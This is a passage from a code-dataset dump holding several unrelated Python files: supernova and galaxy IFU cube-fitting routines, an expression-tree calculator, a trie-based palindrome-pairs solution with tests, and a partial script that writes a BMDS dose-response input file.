clip, maxiter=10):\n \"\"\"Guess sky based on lower signal spaxels compatible with variance\n\n Parameters\n ----------\n cube : DataCube\n clip : float\n Number of standard deviations (not variances) to use as\n the clipping limit (on individual pixels).\n maxiter : int\n Maximum number of sigma-clipping interations. Default is 10.\n\n Returns\n -------\n sky : np.ndarray (1-d)\n Sky level for each wavelength.\n \"\"\"\n\n nspaxels = cube.ny * cube.nx\n\n weight = np.copy(cube.weight)\n var = 1.0 / weight\n\n # Loop until mask stops changing size or until a maximum\n # number of iterations.\n avg = None\n oldmask = None\n mask = None\n for j in range(maxiter):\n oldmask = mask\n\n # weighted average spectrum (masked array).\n # We use a masked array because some of the wavelengths\n # may have all-zero weights for every pixel.\n # The masked array gets propagated so that `mask` is a\n # masked array of booleans!\n avg = np.ma.average(cube.data, weights=weight, axis=(1, 2))\n deviation = cube.data - avg[:, None, None]\n mask = deviation**2 > clip**2 * var\n\n # Break if the mask didn't change.\n if (oldmask is not None and\n (mask.data == oldmask.data).all() and\n (mask.mask == oldmask.mask).all()):\n break\n\n # set weights of masked pixels to zero. masked elements\n # of the mask are *not* changed.\n weight[mask] = 0.0\n var[mask] = 0.0\n\n # convert to normal (non-masked) array. Masked wavelengths are\n # set to zero in this process.\n return np.asarray(avg)\n\n\ndef guess_sky(cube, npix=10):\n \"\"\"Guess sky based on lowest signal pixels.\n\n With the small field of fiew of an IFU, we have no guarantee of\n getting an accurate measurement of the real sky level; the galaxy\n might extend far past the edges of the IFU.\n\n Here we simply take a weighted average of the lowest `npix` pixels\n at each wavelength. This estimate will be higher than the real sky\n value (which would be lower than the lowest pixel value in the\n absence of noise), but its about the best we can do.\n\n Parameters\n ----------\n cube : DataCube\n npix : int\n\n Returns\n -------\n sky : np.ndarray (1-d)\n Sky level at each wavelength.\n \"\"\"\n\n # reshape data to (nw, nspaxels)\n flatshape = (cube.nw, cube.ny * cube.nx)\n flatdata = cube.data.reshape(flatshape)\n flatweight = cube.weight.reshape(flatshape)\n\n # get rid of spaxels that are *all* zero weight\n mask = ~np.all(flatweight == 0.0, axis=0)\n flatdata = flatdata[:, mask]\n flatweight = flatweight[:, mask]\n\n # average over wavelengths: 1-d array of (nspaxels,)\n avg = np.average(flatdata, weights=flatweight, axis=0)\n\n # get indicies of lowest `npix` spaxels in flattened data\n idx = np.argsort(avg)[0:npix]\n\n # get average spectrum of those spaxels\n sky = np.average(flatdata[:, idx], weights=flatweight[:, idx], axis=1)\n\n return sky\n\n\ndef determine_sky_and_sn(galmodel, snmodel, data, weight):\n \"\"\"Estimate the sky and SN level for a single epoch.\n\n Given a fixed galaxy and fixed SN PSF shape in the model, the\n (assumed spatially flat) sky background and SN flux are estimated.\n\n Parameters\n ----------\n galmodel : ndarray (3-d)\n The model, evaluated on the data grid.\n snmodel : ndarray (3-d)\n The PSF, evaluated on the data grid at the SN position.\n data : ndarray (3-d)\n weight : ndarray (3-d)\n\n Returns\n -------\n sky : ndarray\n 1-d sky spectrum for given epoch.\n sn : ndarray\n 1-d SN spectrum for given epoch.\n \"\"\"\n\n A11 = (weight * snmodel**2).sum(axis=(1, 2))\n A12 = (-weight * snmodel).sum(axis=(1, 2))\n A21 = A12\n A22 = weight.sum(axis=(1, 2))\n\n denom = A11*A22 - A12*A21\n\n # There are some cases where we have slices with only 0\n # values and weights. Since we don't mix wavelengths in\n # this calculation, we put a dummy value for denom and\n # then put the sky and sn values to 0 at the end.\n mask = denom == 0.0\n if not np.all(A22[mask] == 0.0):\n raise ValueError(\"found null denom for slices with non null \"\n \"weight\")\n denom[mask] = 1.0\n\n # w2d, w2dy w2dz are used to calculate the variance using\n # var(alpha x) = alpha^2 var(x)*/\n tmp = weight * data\n wd = tmp.sum(axis=(1, 2))\n wdsn = (tmp * snmodel).sum(axis=(1, 2))\n wdgal = (tmp * galmodel).sum(axis=(1, 2))\n\n tmp = weight * galmodel\n wgal = tmp.sum(axis=(1, 2))\n wgalsn = (tmp * snmodel).sum(axis=(1, 2))\n wgal2 = (tmp * galmodel).sum(axis=(1, 2))\n\n b_sky = (wd * A11 + wdsn * A12) / denom\n c_sky = (wgal * A11 + wgalsn * A12) / denom\n b_sn = (wd * A21 + wdsn * A22) / denom\n c_sn = (wgal * A21 + wgalsn * A22) / denom\n\n sky = b_sky - c_sky\n sn = b_sn - c_sn\n\n sky[mask] = 0.0\n sn[mask] = 0.0\n\n return sky, sn\n\n\ndef chisq_galaxy_single(galaxy, data, weight, ctr, atm):\n \"\"\"Chi^2 and gradient (not including regularization term) for a single\n epoch.\"\"\"\n\n scene = atm.evaluate_galaxy(galaxy, data.shape[1:3], ctr)\n r = data - scene\n wr = weight * r\n val = np.sum(wr * r)\n grad = atm.gradient_helper(-2. * wr, data.shape[1:3], ctr)\n\n return val, grad\n\n\ndef chisq_galaxy_sky_single(galaxy, data, weight, ctr, atm):\n \"\"\"Chi^2 and gradient (not including regularization term) for \n single epoch, allowing sky to float.\"\"\"\n\n scene = atm.evaluate_galaxy(galaxy, data.shape[1:3], ctr)\n r = data - scene\n\n # subtract off sky (weighted avg of residuals)\n sky = np.average(r, weights=weight, axis=(1, 2))\n r -= sky[:, None, None]\n\n wr = weight * r\n val = np.sum(wr * r)\n\n # See note in docs/gradient.tex for the (non-trivial) derivation\n # of this gradient!\n tmp = np.sum(wr, axis=(1, 2)) / np.sum(weight, axis=(1, 2))\n vtwr = weight * tmp[:, None, None]\n grad = atm.gradient_helper(-2. * (wr - vtwr), data.shape[1:3], ctr)\n\n return val, grad\n\n\ndef chisq_galaxy_sky_multi(galaxy, datas, weights, ctrs, atms):\n \"\"\"Chi^2 and gradient (not including regularization term) for \n multiple epochs, allowing sky to float.\"\"\"\n\n val = 0.0\n grad = np.zeros_like(galaxy)\n for data, weight, ctr, atm in zip(datas, weights, ctrs, atms):\n epochval, epochgrad = chisq_galaxy_sky_single(galaxy, data, weight,\n ctr, atm)\n val += epochval\n grad += epochgrad\n\n return val, grad\n\n\ndef fit_galaxy_single(galaxy0, data, weight, ctr, atm, regpenalty, factor):\n \"\"\"Fit the galaxy model to a single epoch of data.\n\n Parameters\n ----------\n galaxy0 : ndarray (3-d)\n Initial galaxy model.\n data : ndarray (3-d)\n Sky-subtracted data.\n weight : ndarray (3-d)\n ctr : tuple\n Length 2 tuple giving y, x position of data in model coordinates.\n factor : float\n Factor used in fmin_l_bfgs_b to determine fit accuracy.\n \"\"\"\n\n # Define objective function to minimize.\n # Returns chi^2 (including regularization term) and its gradient.\n def objective(galparams):\n\n # galparams is 1-d (raveled version of galaxy); reshape to 3-d.\n galaxy = galparams.reshape(galaxy0.shape)\n cval, cgrad = chisq_galaxy_single(galaxy, data, weight, ctr, atm)\n rval, rgrad = regpenalty(galaxy)\n totval = cval + rval\n logging.debug(u'\\u03C7\\u00B2 = %8.2f (%8.2f + %8.2f)', totval, cval, rval)\n\n # ravel gradient to 1-d when returning.\n return totval, np.ravel(cgrad + rgrad)\n\n # run minimizer\n galparams0 = np.ravel(galaxy0) # fit parameters must be 1-d\n galparams, f, d = fmin_l_bfgs_b(objective, galparams0, factr=factor)\n _check_result(d['warnflag'], d['task'])\n _log_result(\"fmin_l_bfgs_b\", f, d['nit'], d['funcalls'])\n\n return galparams.reshape(galaxy0.shape)\n\n\ndef fit_galaxy_sky_multi(galaxy0, datas, weights, ctrs, atms, regpenalty,\n factor):\n \"\"\"Fit the galaxy model to multiple data cubes.\n\n Parameters\n ----------\n galaxy0 : ndarray (3-d)\n Initial galaxy model.\n datas : list of ndarray\n Sky-subtracted data for each epoch to fit.\n \"\"\"\n\n nepochs = len(datas)\n\n # Get initial chisq values for info output.\n cvals_init = []\n for data, weight, ctr, atm in zip(datas, weights, ctrs, atms):\n cval, _ = chisq_galaxy_single(galaxy0, data, weight, ctr, atm)\n cvals_init.append(cval)\n\n\n # Define objective function to minimize.\n # Returns chi^2 (including regularization term) and its gradient.\n def objective(galparams):\n\n # galparams is 1-d (raveled version of galaxy); reshape to 3-d.\n galaxy = galparams.reshape(galaxy0.shape)\n cval, cgrad = chisq_galaxy_sky_multi(galaxy, datas, weights,\n ctrs, atms)\n rval, rgrad = regpenalty(galaxy)\n rval *= nepochs\n rgrad *= nepochs\n\n totval = cval + rval\n logging.debug(u'\\u03C7\\u00B2 = %8.2f (%8.2f + %8.2f)', totval, cval, rval)\n\n # ravel gradient to 1-d when returning.\n return totval, np.ravel(cgrad + rgrad)\n\n # run minimizer\n galparams0 = np.ravel(galaxy0) # fit parameters must be 1-d\n galparams, f, d = fmin_l_bfgs_b(objective, galparams0, factr=factor)\n _check_result(d['warnflag'], d['task'])\n _log_result(\"fmin_l_bfgs_b\", f, d['nit'], d['funcalls'])\n\n galaxy = galparams.reshape(galaxy0.shape)\n\n # Get final chisq values.\n cvals = []\n for data, weight, ctr, atm in zip(datas, weights, ctrs, atms):\n cval, _ = chisq_galaxy_single(galaxy, data, weight, ctr, atm)\n cvals.append(cval)\n\n logging.info(u\" initial \\u03C7\\u00B2/epoch: [%s]\",\n \", \".join([\"%8.2f\" % v for v in cvals_init]))\n logging.info(u\" final \\u03C7\\u00B2/epoch: [%s]\",\n \", \".join([\"%8.2f\" % v for v in cvals]))\n\n # get last-calculated skys, given galaxy.\n skys = []\n for data, weight, ctr, atm in zip(datas, weights, ctrs, atms):\n scene = atm.evaluate_galaxy(galaxy, data.shape[1:3], ctr)\n sky = np.average(data - scene, weights=weight, axis=(1, 2))\n skys.append(sky)\n\n return galaxy, skys\n\n\ndef fit_position_sky(galaxy, data, weight, ctr0, atm):\n \"\"\"Fit data position and sky for a single epoch (fixed galaxy model).\n\n Parameters\n ----------\n galaxy : ndarray (3-d)\n data : ndarray (3-d)\n weight : ndarray(3-d)\n ctr0 : (float, float)\n Initial center.\n\n Returns\n -------\n ctr : (float, float)\n (y, x) center position.\n sky : ndarray (1-d)\n Fitted sky.\n \"\"\"\n\n BOUND = 3. # +/- position bound in spaxels\n minbound = np.array(ctr0) - BOUND\n maxbound = np.array(ctr0) + BOUND\n\n gshape = galaxy.shape[1:3] # model shape\n dshape = data.shape[1:3]\n\n (yminabs, ymaxabs), (xminabs, xmaxabs) = yxbounds(gshape, dshape)\n minbound[0] = max(minbound[0], yminabs) # ymin\n maxbound[0] = min(maxbound[0], ymaxabs) # ymax\n minbound[1] = max(minbound[1], xminabs) # xmin\n maxbound[1] = min(maxbound[1], xmaxabs) # xmax\n\n def objective_func(ctr):\n if not (minbound[0] < ctr[0] < maxbound[0] and\n minbound[1] < ctr[1] < maxbound[1]):\n return np.inf\n gal = atm.evaluate_galaxy(galaxy, dshape, ctr)\n\n # determine sky (linear problem)\n resid = data - gal\n sky = np.average(resid, weights=weight, axis=(1, 2))\n\n out = np.sum(weight * (resid - sky[:, None, None])**2)\n\n logging.debug(\"(%f, %f) %f\", ctr[0], ctr[1], out)\n\n return out\n\n ctr, fval, niter, ncall, warnflag = fmin(objective_func, ctr0,\n full_output=1, disp=0)\n _check_result_fmin(warnflag)\n _log_result(\"fmin\", fval, niter, ncall)\n\n # get last-calculated sky.\n gal = atm.evaluate_galaxy(galaxy, dshape, ctr)\n sky = np.average(data - gal, weights=weight, axis=(1, 2))\n\n return tuple(ctr), sky\n\ndef chisq_position_sky_sn_multi(allctrs, galaxy, datas, weights, atms):\n \"\"\"Function to minimize. `allctrs` is a 1-d ndarray:\n\n [yctr[0], xctr[0], yctr[1], xctr[1], ..., snyctr, snxctr]\n\n where the indicies are\n \"\"\"\n EPS = 0.001 # size of change in spaxels for gradient calculation\n\n nepochs = len(datas)\n allctrs = allctrs.reshape((nepochs+1, 2))\n snctr = tuple(allctrs[nepochs, :])\n\n # initialize return values\n grad = np.zeros_like(allctrs)\n chisq = 0.\n\n for i in range(nepochs):\n data = datas[i]\n weight = weights[i]\n atm = atms[i]\n ctr = tuple(allctrs[i, :])\n\n # calculate chisq for this epoch; add to total.\n gal = atm.evaluate_galaxy(galaxy, data.shape[1:3], ctr)\n psf = atm.evaluate_point_source(snctr, data.shape[1:3], ctr)\n sky, sn = determine_sky_and_sn(gal, psf, data, weight)\n scene = sky[:, None, None] + gal + sn[:, None, None] * psf\n epoch_chisq = np.sum(weight * (data - scene)**2)\n chisq += epoch_chisq\n\n # calculate change in chisq from changing the sn position,\n # in this epoch.\n for j, snctr2 in ((0, (snctr[0]+EPS, snctr[1] )),\n (1, (snctr[0] , snctr[1]+EPS))):\n psf = atm.evaluate_point_source(snctr2, data.shape[1:3], ctr)\n sky, sn = determine_sky_and_sn(gal, psf, data, weight)\n scene = sky[:, None, None] + gal + sn[:, None, None] * psf\n new_epoch_chisq = np.sum(weight * (data - scene)**2)\n grad[nepochs, j] += (new_epoch_chisq - epoch_chisq) / EPS\n\n # calculate change in chisq from changing the data position for\n # this epoch.\n for j, ctr2 in ((0, (ctr[0]+EPS, ctr[1] )),\n (1, (ctr[0] , ctr[1]+EPS))):\n gal = atm.evaluate_galaxy(galaxy, data.shape[1:3], ctr2)\n psf = atm.evaluate_point_source(snctr, data.shape[1:3], ctr2)\n sky, sn = determine_sky_and_sn(gal, psf, data, weight)\n scene = sky[:, None, None] + gal + sn[:, None, None] * psf\n new_epoch_chisq = np.sum(weight * (data - scene)**2)\n grad[i, j] = (new_epoch_chisq - epoch_chisq) / EPS\n\n # reshape gradient to 1-d upon return.\n return chisq, np.ravel(grad)\n\ndef fit_position_sky_sn_multi(galaxy, datas, weights, ctrs0, snctr0, atms):\n \"\"\"Fit data pointing (nepochs), SN position (in model frame),\n SN amplitude (nepochs), and sky level (nepochs). This is meant to be\n used only on epochs with SN light.\n\n Parameters\n ----------\n galaxy : ndarray (3-d)\n datas : list of ndarray (3-d)\n weights : list of ndarray (3-d)\n ctrs0 : list of tuples\n Initial data positions (y, x)\n snctr0 : tuple\n Initial SN position.\n atms : list of AtmModels\n\n Returns\n -------\n fctrs : list of tuples\n Fitted data positions.\n fsnctr : tuple\n Fitted SN position.\n skys : list of ndarray (1-d)\n FItted sky spectra for each epoch.\n sne : list of ndarray (1-d)\n Fitted SN spectra for each epoch.\n\n Notes\n -----\n Given the data pointing and SN position, determining\n the sky level and SN amplitude is a linear problem. Therefore, we\n have only the data pointing and sn position as parameters in the\n (nonlinear) optimization and determine the sky and sn amplitude in\n each iteration.\n \"\"\"\n\n BOUND = 2. # +/- position bound in spaxels\n\n nepochs = len(datas)\n assert len(weights) == len(ctrs0) == len(atms) == nepochs\n\n # Initial parameter array. Has order [y0, x0, y1, x1, ... , ysn, xsn].\n allctrs0 = np.ravel(np.vstack((ctrs0, snctr0)))\n\n # Default parameter bounds for all parameters.\n minbound = allctrs0 - BOUND\n maxbound = allctrs0 + BOUND\n\n # For data position parameters, check that bounds do not extend\n # past the edge of the model and adjust the minbound and maxbound.\n # For SN position bounds, we don't do any checking like this.\n gshape = galaxy.shape[1:3] # model shape\n for i in range(nepochs):\n dshape = datas[i].shape[1:3]\n (yminabs, ymaxabs), (xminabs, xmaxabs) = yxbounds(gshape, dshape)\n minbound[2*i] = max(minbound[2*i], yminabs) # ymin\n maxbound[2*i] = min(maxbound[2*i], ymaxabs) # ymax\n minbound[2*i+1] = max(minbound[2*i+1], xminabs) # xmin\n maxbound[2*i+1] = min(maxbound[2*i+1], xmaxabs) # xmax\n\n # [(y0min, y0max), (x0min, x0max), ...]\n bounds = list(zip(minbound, maxbound))\n\n def callback(params):\n for i in range(len(params)//2-1):\n logging.debug('Epoch %s: %s, %s', i, params[2*i], params[2*i+1])\n logging.debug('SN position %s, %s', params[-2], params[-1])\n logging.debug('Bounds:')\n callback(bounds)\n logging.debug('')\n\n fallctrs, f, d = fmin_l_bfgs_b(chisq_position_sky_sn_multi, allctrs0,\n args=(galaxy, datas, weights, atms),\n iprint=0, callback=callback, bounds=bounds)\n _check_result(d['warnflag'], d['task'])\n _log_result(\"fmin_l_bfgs_b\", f, d['nit'], d['funcalls'])\n\n # pull out fitted positions\n fallctrs = fallctrs.reshape((nepochs+1, 2))\n fsnctr = tuple(fallctrs[nepochs, :])\n fctrs = [tuple(fallctrs[i, :]) for i in range(nepochs)]\n\n # evaluate final sky and sn in each epoch\n skys = []\n sne = []\n for i in range(nepochs):\n gal = atms[i].evaluate_galaxy(galaxy, datas[i].shape[1:3], fctrs[i])\n psf = atms[i].evaluate_point_source(fsnctr, datas[i].shape[1:3],\n fctrs[i])\n sky, sn = determine_sky_and_sn(gal, psf, datas[i], weights[i])\n skys.append(sky)\n sne.append(sn)\n\n return fctrs, fsnctr, skys, sne\n","sub_path":"cubefit/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":19257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"399730513","text":"class compile_TreeNode(object):\n def __init__(self, left=None, right=None, v_node=''):\n self.left = left\n self.right = right\n self.node_value = v_node\n self.priority = 0\n self.is_Leaf = False\n return\n\n def isLeaf(self):\n if self.left is None and self.right is None:\n self.is_Leaf = True\n else:\n self.is_Leaf = False\n\n\nclass compile_Tree(object):\n def __init__(self):\n # self.prior_lexPool = Calc_Object.lexBox.lexPool\n return\n\n @staticmethod\n def make_priority(Calc_Object, tb_id=0, end_id=0):\n calculator = Calc_Object\n lexCon = calculator.lexBox.lexPool\n for index in range(tb_id, end_id, 1):\n if lexCon[index]['e_Value'] is '(':\n b_index = calculator.lexBox.match_map[str(index+1)]\n b_id = calculator.lexBox.bracket_record[')'][b_index-1]\n for p_prior in range(index+1, b_id, 1):\n if lexCon[p_prior]['is_Calc']:\n if lexCon[p_prior]['e_Value'] is not '(':\n if lexCon[p_prior]['e_Value'] in ['*', '/']:\n lexCon[p_prior]['priority'] = lexCon[index]['priority'] + 1\n elif lexCon[p_prior]['e_Value'] in ['+', '-']:\n lexCon[p_prior]['priority'] = lexCon[index]['priority']\n else:\n bb_index = calculator.lexBox.match_map[str(p_prior+1)]\n bb_id = calculator.lexBox.bracket_record[')'][bb_index-1]\n lexCon[p_prior]['priority'] = lexCon[index]['priority'] + 2\n compile_Tree.make_priority(Calc_Object, tb_id=p_prior, end_id=bb_id)\n return\n\n def get_rValue(self):\n\n return\n\n @staticmethod\n def make_Tree(lex_Slice, lex_Object):\n min_priority = 1e5\n min_id_list = []\n _id = 1\n cnt = 0\n lexCon = lex_Slice\n temp_lex = []\n t_root = compile_TreeNode()\n # In a Block\n for item in lexCon:\n temp_lex.append(item)\n if item['is_Calc'] and item['e_Value'] in ['(', ')']:\n temp_lex.remove(item)\n assert len(temp_lex) > 0\n if len(temp_lex) == 1:\n t_root.node_value = temp_lex[_id-1]['e_Value']\n # t_root.priority = temp_lex[_id-1]['priority']\n else:\n for item in temp_lex:\n cnt += 1\n if item['is_Calc'] and item['e_Value'] not in ['(', ')']:\n if min_priority >= item['priority']:\n min_priority = item['priority']\n # min_id = item['lex_id']\n _id = cnt\n # Assert Index range\n # Left Tree Branch\n # _l_end = lexCon[_id-2]['lex_id']\n # _l_index = lex_Object.bracket_record[')'].index(_l_end)\n # _l = lex_Object.match_map[')-{0}'.format(_l_index+1)]\n t_root.node_value = temp_lex[_id-1]['e_Value']\n llex_Slice_son = temp_lex[0:_id-1]\n assert len(llex_Slice_son) > 0\n if len(llex_Slice_son) > 1:\n new_lnode = compile_Tree.make_Tree(llex_Slice_son, lex_Object)\n else:\n new_lnode = compile_TreeNode(v_node=llex_Slice_son[0]['e_Value'])\n new_lnode.isLeaf()\n t_root.left = new_lnode\n # Right Tree Branch\n # _r = lexCon[_id]['lex_id']\n # _r_index = lex_Object.match_map['{0}'.format(_r)]\n # _r_end = lex_Object.bracket_record['('][_r_index-1]\n rlex_Slice_son = temp_lex[_id:]\n assert len(rlex_Slice_son) > 0\n if len(rlex_Slice_son) > 1:\n new_rnode = compile_Tree.make_Tree(rlex_Slice_son, lex_Object)\n else:\n new_rnode = compile_TreeNode(v_node=rlex_Slice_son[0]['e_Value'])\n new_rnode.isLeaf()\n t_root.right = new_rnode\n # Check is Leaf or not\n t_root.isLeaf()\n return t_root\n\n @staticmethod\n def calc_result(Tree_node):\n # DFS for result\n t_value = 0\n l_value = 0\n r_value = 0\n if not Tree_node.is_Leaf:\n if Tree_node.left is not None:\n l_value = compile_Tree.calc_result(Tree_node.left)\n if Tree_node.right is not None:\n r_value = compile_Tree.calc_result(Tree_node.right)\n if Tree_node.node_value is '+':\n t_value = l_value + r_value\n if Tree_node.node_value is '-':\n t_value = l_value - r_value\n if Tree_node.node_value is '*':\n t_value = l_value * r_value\n if Tree_node.node_value is '/':\n t_value = l_value / r_value\n else:\n t_value = float(Tree_node.node_value)\n return t_value\n\n\n\n\n\n\n","sub_path":"num_calculator/Compile_Tree.py","file_name":"Compile_Tree.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"111722120","text":"import unittest\nfrom typing import List\n\nclass Trie:\n def __init__(self):\n self.children = {}\n self.index = None\n\n def insert(self, word, i):\n curr = self\n for c in word:\n if c not in curr.children:\n curr.children[c] = Trie()\n curr = curr.children[c]\n curr.index = i\n\n def search(self, prefix):\n curr = self\n indexes = []\n for c in prefix:\n if c not in curr.children:\n # unmatched part can still be pal, so don't return\n break\n if curr.index is not None:\n # unmatched part can still be pal, so count any met word\n indexes.append(curr.index)\n curr = curr.children[c]\n\n # find all words with matched prefix (part)\n def dfs(trie):\n if trie.index is not None:\n indexes.append(trie.index)\n for c in trie.children.values():\n dfs(c)\n dfs(curr)\n return indexes\n\nclass Solution(unittest.TestCase):\n def palindromePairs(self, words: List[str]) -> List[List[int]]:\n \"\"\"\nGiven a list of unique words, find all pairs of distinct indices (i, j) in the given list, so that the concatenation of the two words, i.e. words[i] + words[j] is a palindrome.\n\nExample 1:\n\nInput: [\"abcd\",\"dcba\",\"lls\",\"s\",\"sssll\"]\nOutput: [[0,1],[1,0],[3,2],[2,4]]\nExplanation: The palindromes are [\"dcbaabcd\",\"abcddcba\",\"slls\",\"llssssll\"]\nExample 2:\n\nInput: [\"bat\",\"tab\",\"cat\"]\nOutput: [[0,1],[1,0]]\nExplanation: The palindromes are [\"battab\",\"tabbat\"]\n\n------\nBasic Idea: Use trie to store reversed words, when search word, match as much as possible.\n The unmatched part can still be pal, so that when meet any word in trie, count it in. And when either no more char in word or trie, don't stop\n\"\"\"\n trie = Trie()\n empties = []\n for i,w in enumerate(words):\n if not w:\n empties.append(i)\n else:\n # insert reverse of word\n trie.insert(w[::-1], i)\n\n cache = {}\n def isPal(word):\n if word in cache:\n return cache[word]\n l, r = 0, len(word)-1\n while l < r:\n if word[l] != word[r]:\n cache[word] = False\n return False\n l += 1\n r -= 1\n cache[word] = True\n return True\n\n res = []\n for i,w in enumerate(words):\n # if w is empty, essentially is check any other word is pal\n # if w is not empty, also check empties which essentially check if w is pal\n indexes = list(range(len(words))) if not w else trie.search(w) + empties\n for j in indexes:\n if j != i and isPal(w+words[j]):\n res.append([i,j])\n return res\n\n def test(self):\n self.assertCountEqual([[3,0],[1,3],[4,0],[2,4],[5,0],[0,5]], self.palindromePairs([\"a\",\"b\",\"c\",\"ab\",\"ac\",\"aa\"]))\n self.assertCountEqual([[0,1],[1,0]], self.palindromePairs([\"a\",\"\"]))\n self.assertCountEqual([[0,1],[1,0],[3,2],[2,4]], self.palindromePairs([\"abcd\",\"dcba\",\"lls\",\"s\",\"sssll\"]))\n self.assertCountEqual([[0,1],[1,0]], self.palindromePairs([\"bat\",\"tab\",\"cat\"]))\n","sub_path":"src/main/python/palindrome_pairs.py","file_name":"palindrome_pairs.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"501084950","text":"import os\nimport inspect\nimport sys\n\nimport pytest\nscriptpath = \"../bmds/\"\n\n# Add the directory containing your module to the Python path (wants absolute paths)\nsys.path.append(os.path.abspath(scriptpath))\nimport bmds\n\n\n\"\"\"\n@pytest.fixture\ndef dataset():\n return bmds.ContinuousDataset(\n doses=[0, 10, 50, 150, 400],\n ns=[111, 142, 143, 93, 42],\n responses=[2.112, 2.095, 1.956, 1.587, 1.254],\n stdevs=[0.235, 0.209, 0.231, 0.263, 0.159])\n\"\"\"\n\nModel_name = \"NCTR\"\nUser_notes = \"BMDS NCTR model, ...\"\nInput_file_name = \"NCTR.(D)\"\nOutput_file_name = \"NCTR.OUT\"\nN_obs = 39 # [5] number of observations\nN_dose_groups = 4 # [5a] number of dose groups\n\nMax_iter = 500 # [6a] Maximum # of iterations\nRel = 1.00e-8 # [6b] Rel Function Convergence\nPara_conv = 1.00e-8 # [6c] Parameter Convergence\nCurve = 0 # 7 BMDL Curve Calculation\nRestrict = 1 # 8 Restrict Power\nCalculation = 1 # 9 BMD Calculation\nF_size = 0 # 10 fixed size\n\nAppend = 0 # [11] Append or Overwrite Output File\nSmooth = 0 # [12] Smooth Option\nBMR = 0.100 # [13] BMR (BMR level)\nRisk = 0 # [14] Risk Type\nConfidence = 0.95 # [15] Confidence Level\n\nBootstrap = 1000 # [16] Bootstrap Iterations\nSeed = 0 # [17] Seed\nAlpha = -9999 # [18] Alpha Parameter, [28]\nRho = -9999 # [19] Rho Parameter, [29]\nBeta = -9999 # [20] Beta Parameter, [30]\n\nTheta1 = -9999 # [21] Theta1 Parameter, [31]\nTheta2 = -9999 # [22] Theta2 Parameter, [32]\nPhi1 = -9999 # [23] Phi1 Parameter, [33]\nPhi2 = -9999 # [24] Phi2 Parameter, [34]\nPhi3 = -9999 # [25] Phi3 Parameter, [35]\nPhi4 = -9999 # [26] Phi4 Parameter, [36]\nInit = 0 # [27] Initialize Parameters\n#\n#\n#\n\n\n\"\"\"\n# [37] Dose Name\n# [38] Response Name\n# [39] Constant String: NEGATIVE_RESPONSE\n# [40] Litter Specific Covariate\n# [41] Column 5 name\n\n\"\"\"\ndoses=[0, 25, 50, 100]\nsample_size=[111, 142, 143, 93, 42]\nresponses=[2.112, 2.095, 1.956, 1.587, 1.254]\nstdevs=[0.235, 0.209, 0.231, 0.263, 0.159]\n\nf = open('NCTR.(D)', 'w')\n\n\nf.write(Model_name + '\\n')\nf.write(User_notes + '\\n')\nf.write(Input_file_name + '\\n')\nf.write(Output_file_name + '\\n')\nf.write(str(N_obs) + \" \" + str(N_dose_groups) + '\\n')\nf.write(str(Max_iter) + \" \" + str(Rel) + \" \" + str(Para_conv) + \" \" + str(Curve) + \" \" + str(Restrict) + \" \")\nf.write(str(Calculation) + \" \" + str(F_size) + \" \" + str(Append) + \" \" + str(Smooth) + '\\n')\nf.write(str(BMR) + \" \" + str(Risk) + \" \" + str(Confidence) + \" \" + str(Bootstrap) + \" \" + str(Seed) + '\\n')\nf.write(str(Alpha) + \" \" + str(Rho) + \" \" + str(Beta) + \" \" + str(Theta1) + \" \" + str(Theta2) + '\\n')\nf.write(str(Phi1) + \" \" + str(Phi2) + \" \" + str(Phi3) + \" \" + str(Phi4) + '\\n')\nf.write(str(Init) + '\\n')\nf.write(str(Alpha) + \" \" + str(Rho) + \" \" + str(Beta) + \" \" + str(Theta1) + \" \" + str(Theta2) + '\\n')\nf.write(str(Phi1) + \" \" + str(Phi2) + \" \" + str(Phi3) + \" \" + str(Phi4) + '\\n')\n\nf.write(\"Dose Resp Negative_Resp Covariate Dose_Group\" + '\\n')\nf.write(str(doses[0]) + \" 1 15 16 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 1 8 9 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 2 13 15 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 3 11 14 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 3 10 13 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 0 9 9 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 2 8 10 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 2 12 14 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 1 9 10 -9999\" + '\\n')\nf.write(str(doses[0]) + \" 2 9 11 -9999\" + '\\n')\n\nf.write(str(doses[1]) + \" 4 10 14 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 5 4 9 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 6 8 14 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 2 7 9 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 6 7 13 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 3 9 12 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 1 9 10 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 2 8 10 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 4 7 11 -9999\" + '\\n')\nf.write(str(doses[1]) + \" 3 11 14 -9999\" + '\\n')\n\nf.write(str(doses[2]) + \" 4 7 11 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 5 6 11 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 5 9 14 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 4 7 11 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 5 5 10 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 4 7 11 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 5 5 10 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 6 9 15 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 2 5 7 -9999\" + '\\n')\nf.write(str(doses[2]) + \" 4 10 14 -9999\" + '\\n')\n\nf.write(str(doses[3]) + \" 6 5 11 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 6 8 14 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 8 4 12 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 7 6 13 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 8 4 12 